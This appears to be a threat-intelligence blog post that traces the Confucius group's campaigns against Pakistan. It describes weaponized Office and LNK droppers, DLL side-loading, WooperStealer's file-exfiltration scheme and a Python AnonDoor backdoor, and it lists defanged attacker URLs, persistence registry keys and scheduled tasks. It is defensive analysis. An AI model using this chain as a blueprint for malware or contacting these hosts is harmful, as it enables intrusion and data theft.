Over the past several months, FortiGuard Labs has observed Confucius evolving its tradecraft, leveraging weaponized Office documents, malicious LNK files, and multiple malware families, including custom Python RATs and advanced stealers. The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities. Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness. In this blog, we will provide a chronological walkthrough of Confucius’ recent activity.

Once Document.ppsx was opened, it displayed a “Corrupted Page” message. An embedded OLE object in slide1.xml.rels then triggered a script in the background from the remote URL greenxeonsr.info.

The mango44NX.doc file is a VBScript that forms a compact dropper with persistence and execution staging capabilities. The first part downloads a remote payload from hxxps://greenxeonsr[.]info/Jsdfwejhrg.rko via MSXML2.XMLHTTP, writes the raw response bytes into %LocalAppData%\Mapistub.dll using an ADODB.Stream, and then closes the stream.

It then copies C:\Windows\System32\fixmapi.exe to the directory %AppData% as Swom.exe and writes a registry string value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load that points to it for persistence. It finally uses a reconstructed Shell.Application COM object to launch Swom.exe to achieve DLL side-loading and execute the malicious DLL Mapistub.dll.

The malicious DLL Mapistub.dll prepared two remote addresses (cornfieldblue[.]info and hauntedfishtree[.]info) for the next stage of stealer activity.

After downloading the data, it loaded the file with hard-coded method Yretisdkjhsfkjfh.

Analysis revealed that the final-stage payload was WooperStealer, identifiable by the stringToEscape variable Class1.Wooper. This stealer was configured to collect a wide range of file types with specific extensions: .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .doc, .DOC, .xls, .XLS, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG, .eml, .EML, .pst, .PST, .ZIP, .zip, .RAR, .rar. It parses the compromised system with Directory.GetLogicalDrives and uploads stolen data to the remote URL hxxp://marshmellowflowerscar[.]info.

The malicious DLL, mapistub.dll, copied targeted files into C:\Windows\Tasks and established persistence by adding registry entries.

The DLL embedded two Base64-encoded strings, representing remote hosts for the final payload. Once the additional data was downloaded, the DLL invoked it using the same hard-coded method observed in earlier activity.

The final payload was again identified as WooperStealer, this time with minor modifications to its target list of file extensions: .zip, .rar, .eml, .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .DOC, .doc, .XLS, .xls, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM,, .jpeg, .JPEG.

Figure 13 shows the familiar stringToEscape variable Class1.Wooper, solidifying attribution to WooperStealer.

WooperStealer uses POST requests to upload stolen files with three parameters. value1 included the victim’s system identifiers (<SerialNumber>_<ComputerName>_<UserName>), value2 carried the file path, and value3 transmitted the file hash. This hash-based check ensured that files were not uploaded multiple times.

Based on the telemetry gathered by FortiGuard Labs, this attack targets users in Pakistan.

Unlike previous campaigns that deployed WooperStealer, python313.dll sets up an execution environment for a new Python-based backdoor. It first creates a temporary PowerShell script at %TEMP%\_CL_cb7565c393993c050319426106747613in.ps1, downloaded from hxxps://bloomwpp[.]info/hjopjhfgda.ps1, which installs Scoop and configures the environment variables required to ensure Python code can execute without errors.

It then constructs a remote URL, hxxps://bloomwpp[.]info/hjdfyebvghu[.]pyc, downloads the raw bytes via a synchronous GetByteArrayAsync call, and writes the received bytes to a file named winresume.pyc under the current user’s %LOCALAPPDATA% directory. After writing the file, it marks the file hidden using FileAttributes.Hidden.

It constructs the target file path string %LOCALAPPDATA%\winresume.pyc and then uses a scheduled task to create a task named NetPolicyUpdate that executes pythonw.exe from a Scoop install from the previous PowerShell script %USERPROFILE%\scoop\apps\python\current\pythonw.exe, using the .pyc as an argument every 5 minutes. It then prepares this task for persistence to conceal its attack beyond the previous registry setting and acts as a stealthy launcher as it has no console window.

The PYC file winresume.pyc serves as a backdoor that collects system information, contacts its C2 server, and receives commands for further action.

The following analysis is based on the disassembly code from the PYC file.

By dropping a timestamp into %TEMP%\wctDD1A.tmp, AnonDoor ensures its heavier tasks run at most once every 6 minutes on a host. That reduces noise, avoids redundant exfil, and ensures more controlled timing.

It runs a compact fingerprinting routine that quietly profiles the host and its network before performing any noisy actions. It derives the local egress IP and grabs the hostname and logged-in user. It then fingerprints the OS with platform.platform(). For external context, it queries several public IP echo services in sequence (api.ipify.org, ipinfo.io/ip, icanhazip.com, and ifconfig.me/ip). Once it has a public IP, it geo-locates the country via ip-api.com and ipwhois.app. To uniquely tag hardware, it executes a hidden wmic csproduct get uuid command.

AnonDoor consolidates the collected system information into the parameter uhhg using $!!$ as a delimiter between fields. The resulting data is transmitted to the C2 server, where access and retrieval appear to be restricted to specific geographic targets such as Pakistan. The overall packet structure closely mirrors that of the earlier MSIL-based AnonDoor backdoor, underscoring Confucius’ recent transition toward deploying a Python-based variant of AnonDoor.

It uses the Windows API GetDiskFreeSpaceExW to quietly inventory local storage. It then walks drive letters A:\ through Z:\, checks which paths exist, and for each live volume calls GetDiskFreeSpaceExW. It then converts bytes to GiB using an integer division of 1,073,741,824 and emits compact entries like C:476GB/ Free-120GB, joining all volume information and sending it to the C2 server with the parameter fhgfh.

AnonDoor then contacts its C2 server with the parameter cuud to request further tasks. If the server replies raw task data with anything other than the string Somethingworng1, it immediately sends a POST request back with sout=<ID>@$$@<raw_task_data>. It then splits the data using #$$ and dispatches based on the task name. It supports a series of commands, including CmdExecution, Screenshoot, fileListing, DownloadFile, Directory_listing, FolderDownload, basicinfo, and PasswordDumper. For some tasks, AnonDoor downloads another Python file from the URL inside <raw_task_data> and executes it.

Take the Screenshoot command, for example. AnonDoor receives the module URL hxxps://bloomwpp[.]info/DubjW967VGHD3ykdnhkdhn/dsdcrjhdeenidufoft.py, which is used to capture the victim’s screen. It then builds PNG data of the screenshot into the format of <uuid>!$$$!Screenshoot!$$$!<command>###<module_url>!$$$!<ID>!$$$!<PNG_base64>. It then encodes the entire data with Base64 and sends it back to the C2 server with the parameter  SCtat.

For PasswordDumper, which we observed in September, the URL is hard-coded in the PYC file. AnonDoor routes that task to download both helpers from bloomwpp[.]info and caches their source in memory. During execution, it chooses which helper to run based on the task’s target. Fohjdfj783mq9XX.py is for Firefox, and Fodkh3897mgfdjiuED.py is for Edge.